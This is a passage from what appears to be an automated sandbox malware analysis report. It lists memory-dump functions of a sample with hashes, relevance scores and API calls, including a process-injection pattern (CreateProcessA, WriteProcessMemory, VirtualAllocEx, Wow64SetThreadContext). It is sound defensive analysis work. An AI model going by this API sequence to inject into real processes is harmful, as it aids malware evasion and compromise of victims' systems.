Instruction ID: e04e7b695b697b4b8d745f8762e92f5baf85a01f846bb5d65349ca3f7b5583c3
Opcode Fuzzy Hash: d4d5de5260875915942e0ce813e416d60886bf79a25b3acc7e7899c4ba4e9784
Instruction Fuzzy Hash: 94221470A05218CFEBA4DF69C945BEAB7F2FB89300F1090A9D509AB395DB705992CF40

Function 06B1EEC8 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.390528801604.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6b00000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ddec3fdedb94a11304d3e356ad216aff44b32d5bd14965f552575d383e89e0
Instruction ID: 374a162bf9777bd834d4cd79d4ff1460550f8cea9ae5acf777186f3e424447a9
Opcode Fuzzy Hash: 32ddec3fdedb94a11304d3e356ad216aff44b32d5bd14965f552575d383e89e0
Instruction Fuzzy Hash: 11D1B1B4E00218CFDB54DFA9D994A9DBBB2FF89300F5081A9D409AB365DB319D82CF51

Function 066F7340 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.390528065911.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66f0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4bbcae15970548bdb3e6cb96788cf4a7f3324f8e2b7d3014712f5ffbcee5f7
Instruction ID: 44815e9b20b5d573cd8ddd479f3cbb79c19c0884e04eebc37c4b75214da2f1a1
Opcode Fuzzy Hash: 2d4bbcae15970548bdb3e6cb96788cf4a7f3324f8e2b7d3014712f5ffbcee5f7
Instruction Fuzzy Hash: 84C1D570E15208CFEB94CFA9E984B9DBBF2FB49304F2490A9D509AB355DB705986CF40

Function 066F7350 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.390528065911.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66f0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a1e0d43f41ce9b99ddf73a205a0ec50b93d412dd9a6bcb10c6fd4fed95c90fe
Instruction ID: d52a2311727ad74478a74a304e505b7b4832ca571f2559bbe25fff42a3757dda
Opcode Fuzzy Hash: 4a1e0d43f41ce9b99ddf73a205a0ec50b93d412dd9a6bcb10c6fd4fed95c90fe
Instruction Fuzzy Hash: 56B1C670E15218CFEB94CF6AE984B9DBBF2FB49304F209069D509AB355DB705986CF40

Function 0588A7AF Relevance: 2.6, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 0588A871
', xrefs: 0588A897

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: '$/
API String ID: 0-2558154120
Opcode ID: 43b4125cd8c051d1c4d869ee2cc62a71b1e1452bbc666ad7d128c66e74780152
Instruction ID: b129abe1ec06799b13694145a822198406d7c9fd7348e1cce01af48e11c3c3ff
Opcode Fuzzy Hash: 43b4125cd8c051d1c4d869ee2cc62a71b1e1452bbc666ad7d128c66e74780152
Instruction Fuzzy Hash: 8F31D274904268CFDB64EF68C949BEDBBB1FB49314F0040EAD909AB291DB755E85CF40

Function 066F11C0 Relevance: 2.6, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-, xrefs: 066F291B
R, xrefs: 066F11ED

Memory Dump Source

Source File: 00000004.00000002.390528065911.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66f0000_Count.jbxd

Similarity

API ID:
String ID: -$R
API String ID: 0-3143228895
Opcode ID: 8cfe29a7f3477e154076f7e5e6e62debc03d1fe48a8d37be6db68d77d72dac4f
Instruction ID: a2e6d070701d7f6b3f9c8a47d25c134987da0f11d4653a333a2493459dc83c39
Opcode Fuzzy Hash: 8cfe29a7f3477e154076f7e5e6e62debc03d1fe48a8d37be6db68d77d72dac4f
Instruction Fuzzy Hash: D531E0B0911228CFEBA8EF60DC94BADB7B6FF49304F4042E9D51967250DB315A81CF41

Function 066F14A5 Relevance: 2.5, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

S, xrefs: 066F0DE2
B, xrefs: 066F14E5

Memory Dump Source

Source File: 00000004.00000002.390528065911.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66f0000_Count.jbxd

Similarity

API ID:
String ID: B$S
API String ID: 0-2413125972
Opcode ID: 6c6c3ab3ef65e607ee3d68f0569045acde46c717c6ed65cff6380d39e9fce65c
Instruction ID: a4f79d5102a089767e045269c1b62f8f168dda4450d4ac94f1bcf7d312127bfb
Opcode Fuzzy Hash: 6c6c3ab3ef65e607ee3d68f0569045acde46c717c6ed65cff6380d39e9fce65c
Instruction Fuzzy Hash: CE014B74A15228CFDBA5DF60D89879D77B6FB48304F1050D8A609A3345CB304F81CF00

Function 06631968 Relevance: 2.4, Strings: 1, Instructions: 1109COMMON

Download Yara Rule

Strings

Zx, xrefs: 06631DE3, 06631DEE

Memory Dump Source

Source File: 00000004.00000002.390527345481.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6630000_Count.jbxd

Similarity

API ID:
String ID: Zx
API String ID: 0-1849246431
Opcode ID: f8e6124838b106dba87599950bcabca552ff55454cbd0ffe735b6e663ea9fced
Instruction ID: 0f5ead2176836301bb276a16e7b608be2710d66bc3a0048d511788aa6d89f94d
Opcode Fuzzy Hash: f8e6124838b106dba87599950bcabca552ff55454cbd0ffe735b6e663ea9fced
Instruction Fuzzy Hash: 6AA27A70E08359DFEB55DFA5C8A4BAEBBB5EF46300F10805AD501AB3A1C7349946CFA1

Function 0663194A Relevance: 1.8, Strings: 1, Instructions: 581COMMON

Download Yara Rule

Strings

Zx, xrefs: 06631DE3, 06631DEE

Memory Dump Source

Source File: 00000004.00000002.390527345481.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6630000_Count.jbxd

Similarity

API ID:
String ID: Zx
API String ID: 0-1849246431
Opcode ID: 1139ba685e1a4a77660229273dfedfc8337dee5b4cdc482810a14f11166c29a5
Instruction ID: 4944311bcf7b368d4cc77f7cfeb26424c314bd5edf7779df49e74b3839fc5b64
Opcode Fuzzy Hash: 1139ba685e1a4a77660229273dfedfc8337dee5b4cdc482810a14f11166c29a5
Instruction Fuzzy Hash: 4A2290719093D49FE7228B75CC59B9ABF74AF43304F1544ABE080EB2E3C6785949CB62

Function 068213F4 Relevance: 1.7, APIs: 1, Instructions: 202
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 068215DA

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 137461c97b6979d465e65b3ba9bc5c95273583674e85c2d9aef3083feca5d54e
Instruction ID: 61a7ca21ba7a63a02443d62cfcb0a5901f0743c78a5b5e59f8b4e5ec119d2138
Opcode Fuzzy Hash: 137461c97b6979d465e65b3ba9bc5c95273583674e85c2d9aef3083feca5d54e
Instruction Fuzzy Hash: E5812971D0025A9FDB60CFA9C9857EDBBF2BF48314F248529E999E7240DB749881CF81

Function 06821400 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 068215DA

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 816cf146e0d0b3074041574883dbec6fdde8a711eb30097d564be65daf774e0a
Instruction ID: 6dc3e2627651c6a83c5ea25e0796c4c7e3f1a803331fe4ac6f1ca31647efcf77
Opcode Fuzzy Hash: 816cf146e0d0b3074041574883dbec6fdde8a711eb30097d564be65daf774e0a
Instruction Fuzzy Hash: 57812971D0025A9FDB60CFA9C9857EDBBF2BF48314F248529E959E7240DB749881CF81

Function 06822498 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06822530

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 31d9fc3e75a439fa72be05f83fce001cc425e3748460ce21eeb12b90a3030cf3
Instruction ID: 4cb9a1d5d20811495588a4da0fec16bf5a5677551f11caf803a631b72db5dffe
Opcode Fuzzy Hash: 31d9fc3e75a439fa72be05f83fce001cc425e3748460ce21eeb12b90a3030cf3
Instruction Fuzzy Hash: B1215A759003599FDB50CFA9C8807EEBBF1FF48310F10882AE958A7240C7789654CF60

Function 068224A0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06822530

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f85ed7438a39d0748d74b7ecf5a49a59ba8e2d8320a5c10a99d82df91700c137
Instruction ID: a5c75a0f7207b7c4e6d59b3066f8c927ab2befbdfab0bf56272547863d44446a
Opcode Fuzzy Hash: f85ed7438a39d0748d74b7ecf5a49a59ba8e2d8320a5c10a99d82df91700c137
Instruction Fuzzy Hash: AB213B71D003599FDB50CFA9C884BDEBBF5FF48310F50842AE958A7240C7789A54CBA0

Function 06822BB0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06822C2E

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2200b1b97e1cb907289699e51317fd750cdd764a2de111ecf76f72290d87bde2
Instruction ID: 00cf1edc62a3767b716f479f7e41ec29ab05049e1ff08fe8d321ca177058b333
Opcode Fuzzy Hash: 2200b1b97e1cb907289699e51317fd750cdd764a2de111ecf76f72290d87bde2
Instruction Fuzzy Hash: D5214771D0030A8FDB14DFAAC4847EEBBF4EF88324F54842AD559A7240D7789A85CFA0

Function 0684DF38 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0684DFB4

Memory Dump Source

Source File: 00000004.00000002.390528204101.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_Count.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 41160a600e588b31f3e56a7d8bc182f99382b379fe74b530d3c3b088657103da
Instruction ID: 0f3630b9f67c4cffa8a84fed9fa357d959283bd1fd07970314b57b6e1685f96e
Opcode Fuzzy Hash: 41160a600e588b31f3e56a7d8bc182f99382b379fe74b530d3c3b088657103da
Instruction Fuzzy Hash: 232107718003499FDB10DFAAC8847EEFBF4EF48324F54842AD559A7240D77895558FA1

Function 06822BA9 Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06822C2E

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3fdb5bc1d2e4bd53e4bed16e98a5d18bc0efc07a134e65ff7438dc84000552e0
Instruction ID: 61bee9e4fe9ba5f04dd10301d09ec2812ea649b00bb460f579e6b5f1618870f5
Opcode Fuzzy Hash: 3fdb5bc1d2e4bd53e4bed16e98a5d18bc0efc07a134e65ff7438dc84000552e0
Instruction Fuzzy Hash: D7213875D0030A8FDB14CFAAC4847EEBBF4EF48324F14842AD559A7240D7789A95CFA4

Function 0684DF40 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0684DFB4

Memory Dump Source

Source File: 00000004.00000002.390528204101.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6840000_Count.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6806c841af8854c7af23ed87c728bed489c024ac35c798c2c56b5bb6984f5cbb
Instruction ID: 9fa1345801d6d6dc32f455f19fbf6ad9d3c7eb5de5f12899bc1fe8fcf227d74c
Opcode Fuzzy Hash: 6806c841af8854c7af23ed87c728bed489c024ac35c798c2c56b5bb6984f5cbb
Instruction Fuzzy Hash: A8211571C0034A9FDB10DFAAC884BEEFBF4AF88220F54842AD559A7240D77895558FA1

Function 066005DE Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06600654

Memory Dump Source

Source File: 00000004.00000002.390527144180.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6600000_Count.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 28bf9df0c3c15e8bc4faa14279b190b3d9b7359a73cf796e2307849fc3211834
Instruction ID: ac5606b1ba4fb56b71ad0eaad8565314127bca719166eeecc5135d81091df872
Opcode Fuzzy Hash: 28bf9df0c3c15e8bc4faa14279b190b3d9b7359a73cf796e2307849fc3211834
Instruction Fuzzy Hash: D12110B1D003499FDB10DFAAC884BEEFBF5AF88320F54842AD419A7240C7789945CFA1

Function 066005E0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06600654

Memory Dump Source

Source File: 00000004.00000002.390527144180.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6600000_Count.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9ea2586fb6ecb6ed0d0e48736c92f7447bf725f15690a230f6f04e8175b5cdf6
Instruction ID: b264b7ec4d37ce741de3d68526204656a5fdb92a5927260bd43f6b37e0161984
Opcode Fuzzy Hash: 9ea2586fb6ecb6ed0d0e48736c92f7447bf725f15690a230f6f04e8175b5cdf6
Instruction Fuzzy Hash: 4411F4B1D003499BDB14DFAAC884BAFFBF5AF88320F54842AD419A7240C7749954CFA1

Function 068231A8 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0682321E

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 30464b246c8ace936fbc0b1d42f8a1f05b7b10f286a2b3efb5d2eff4fc2ba3d3
Instruction ID: 6c954be9e329418f1d1cb11b1c3107d7453c94180354198b498ea4bd59239e1b
Opcode Fuzzy Hash: 30464b246c8ace936fbc0b1d42f8a1f05b7b10f286a2b3efb5d2eff4fc2ba3d3
Instruction Fuzzy Hash: A91197B690034A8FDB10CFA9D8447EEFBF5EF48310F14881AD559A7250C7399550CFA0

Function 068231B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0682321E

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4b31a5a6056af3e809cb2d4831d2b0220ece9fed9e35a8ce1c73708a4f3f580a
Instruction ID: 384e289bb056a42fe919c7d5d9b02ef80492aa3326a0e670cbce9280cb94d4cd
Opcode Fuzzy Hash: 4b31a5a6056af3e809cb2d4831d2b0220ece9fed9e35a8ce1c73708a4f3f580a
Instruction Fuzzy Hash: C11137719003499FDB10DFAAD844BDEFBF5EF88324F14881AD519A7250C7799554CFA0

Function 0588B24A Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

*, xrefs: 0588B2E1

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: 1945dbaa5d9cf59774357d8d82526d6d01798846e9f52d37978c8a8ffbd1f7f9
Instruction ID: 638d29e56e0b923f7f40e4822767e86e8fc6d3b87264e246b34fa0a62ce9c986
Opcode Fuzzy Hash: 1945dbaa5d9cf59774357d8d82526d6d01798846e9f52d37978c8a8ffbd1f7f9
Instruction Fuzzy Hash: 8321B574A052698FDB64EF64C989BEDBBB2FB49304F0080DAD919A7291DB715E85CF00

Function 066015C0 Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06601633

Memory Dump Source

Source File: 00000004.00000002.390527144180.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6600000_Count.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9b929fd374e60eab6d84de27a283561bb9cce1ad948192bba81fbab0171ac46f
Instruction ID: c1bdb6e1b053fa390ae0c4705faeceaeaddf6e3728646f34b0e5da5ba52b1509
Opcode Fuzzy Hash: 9b929fd374e60eab6d84de27a283561bb9cce1ad948192bba81fbab0171ac46f
Instruction Fuzzy Hash: 3E1144759002499FDB10CFAAD844BEFFBF5AB88324F14882AD419A7640C7799555CFA0

Function 0588AA1B Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

C, xrefs: 0588AA4B

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: C
API String ID: 0-1037565863
Opcode ID: 6c70555f2988015b3337cff974d9367fbc4b0b4431fdba97470c613b0799a887
Instruction ID: 96745db611b3483b890b0fb46bd2285664f13f0c95bf92ba7794c5e35bbaa126
Opcode Fuzzy Hash: 6c70555f2988015b3337cff974d9367fbc4b0b4431fdba97470c613b0799a887
Instruction Fuzzy Hash: BB21E574A05259CFDB64DF64D895BADB7B2FB44300F5090EAE909A7381DB329E85CF00

Function 05883F49 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

!, xrefs: 05884C9B

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 8b5dcc81c9c3817b1074167d3d3636588ad9040425ad0fd63cbf86e8c91f436f
Instruction ID: db8376d2cbd64db4c85b736f39e4f613ff7c1800d282e2517f7fc0a829397482
Opcode Fuzzy Hash: 8b5dcc81c9c3817b1074167d3d3636588ad9040425ad0fd63cbf86e8c91f436f
Instruction Fuzzy Hash: 35210470904218CFDB64EF65D845BADB7B2FB48304F0090EA994DE7296DA354EC2CF10

Function 066015C8 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06601633

Memory Dump Source

Source File: 00000004.00000002.390527144180.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6600000_Count.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 893ba3a643e4fd2cb6dd16a31ccddf26e1ec515ecc65ea61361af60734855475
Instruction ID: 3455b94168e1c09a88851a0b8aee2b2c18659a70b362530788bd357e7421f625
Opcode Fuzzy Hash: 893ba3a643e4fd2cb6dd16a31ccddf26e1ec515ecc65ea61361af60734855475
Instruction Fuzzy Hash: 371134759003499BDB14DFAAC844BEFFBF5AB88324F14882AD519A7240C775A554CBA0

Function 0588ACD8 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

,, xrefs: 0588ADA2

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: efd5a85c60238775283dd83a83573f00bd1c32cee5b29992096682f76cee805f
Instruction ID: 10e7e001e8531325f9217a5f5ea71b945cb4dba40caa4b81b5b7db9abbbe1e12
Opcode Fuzzy Hash: efd5a85c60238775283dd83a83573f00bd1c32cee5b29992096682f76cee805f
Instruction Fuzzy Hash: 9D21C574A052288FDB64DF64C949BEDBBB1EB89304F1080D9A909A7395DB315E86CF00

Function 0588AAB5 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

B, xrefs: 0588AAC3

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: eaba5a5be91f047c1fe2f40fa0a47913a18ec147882d8a909f91bc5a364b10a3
Instruction ID: 4ef820fe9a40627fad813f011fd4c6c6132a9dbf94a536ec08dbb4aa0fbf70de
Opcode Fuzzy Hash: eaba5a5be91f047c1fe2f40fa0a47913a18ec147882d8a909f91bc5a364b10a3
Instruction Fuzzy Hash: 9D014834A0121ACFDB28EF20D945BEEB7B1EF44300F5080EA950EA7680EB315E84CF00

Function 0588AB56 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

!, xrefs: 0588ABA4

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 5fa6c6cff2e8a900e13a531735ed1b48dd147422b22e4a6d908bf2e855b8b4ef
Instruction ID: b025912365deadb02fdfe014d9f67426734aaf16c15a043b7c11d2051573a3f1
Opcode Fuzzy Hash: 5fa6c6cff2e8a900e13a531735ed1b48dd147422b22e4a6d908bf2e855b8b4ef
Instruction Fuzzy Hash: B201283090025EDBCB21DF54D944BE9B7B2FB48310F00958AE949B7250DB71AA85CF40

Function 0588A789 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

4, xrefs: 0588B432

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 1d129d039d3c78af1d6798edbd56c4ff601a91ffde003e4c3cc93d06f1888a95
Instruction ID: 2ef70fb4398bb683238cf68f76a1423419766087a9f821e62b526c34a628e76c
Opcode Fuzzy Hash: 1d129d039d3c78af1d6798edbd56c4ff601a91ffde003e4c3cc93d06f1888a95
Instruction Fuzzy Hash: 7201E778906218CFDB54DF20D948BE9BBB1FF45315F1490EA980AAB291DB715E86CF04

Function 00F18A76 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

=, xrefs: 00F18AC9

Memory Dump Source

Source File: 00000004.00000002.390504209449.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f10000_Count.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: 65d2d2825fa12118db56aad0469054e9dacdecfff22ea0bf9abb6ec16ec7048c
Instruction ID: cb3bd70efd943b47743fa94f29027e5c7c38fe3a8b2d2c56933dd98c278a5f14
Opcode Fuzzy Hash: 65d2d2825fa12118db56aad0469054e9dacdecfff22ea0bf9abb6ec16ec7048c
Instruction Fuzzy Hash: 67F03A74905269CFDB61DF10DC84BE8B7B1BB81314F1445EAC815B2181C7714AEAEF01

Function 0588B3DB Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

4, xrefs: 0588B432

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: a4c312a999469d597a52d4bf17a4fe96a6a62d5ce5ee706d196a5a4fcf450805
Instruction ID: 6f8d836c4ea1867cce526d442a93db23e0acd3b583aee53b8f4ef25bf734a753
Opcode Fuzzy Hash: a4c312a999469d597a52d4bf17a4fe96a6a62d5ce5ee706d196a5a4fcf450805
Instruction Fuzzy Hash: 52F0D43890A218CFDB54DF20D958BD8FBB1EF45315F1481DAD809AB2A2DB715A86CF40

Function 00F18DB9 Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

5, xrefs: 00F18E02

Memory Dump Source

Source File: 00000004.00000002.390504209449.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f10000_Count.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 17d3a7c4ab35070d7e9b0abc2b3269106ab236934c02d82db9fdfe5574ee10aa
Instruction ID: b6092018a884eaffbc1aa417abc99b44053f66397657d6e1c59817c6cbcaf023
Opcode Fuzzy Hash: 17d3a7c4ab35070d7e9b0abc2b3269106ab236934c02d82db9fdfe5574ee10aa
Instruction Fuzzy Hash: 49F0C9B4D042188FD760EF25D849B89BBF0EB05359F0580EAC54AA3260DB744DC6EF19

Function 066F79B4 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

G, xrefs: 066F79DA

Memory Dump Source

Source File: 00000004.00000002.390528065911.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66f0000_Count.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 85744c9444f4d0cd09355dfef32b0eb717983d14b798b9f66989fe5aa74d40dc
Instruction ID: 1684924407c982b2a7f01f63833fc9df73b132f4ed2b5c746306412362e97f19
Opcode Fuzzy Hash: 85744c9444f4d0cd09355dfef32b0eb717983d14b798b9f66989fe5aa74d40dc
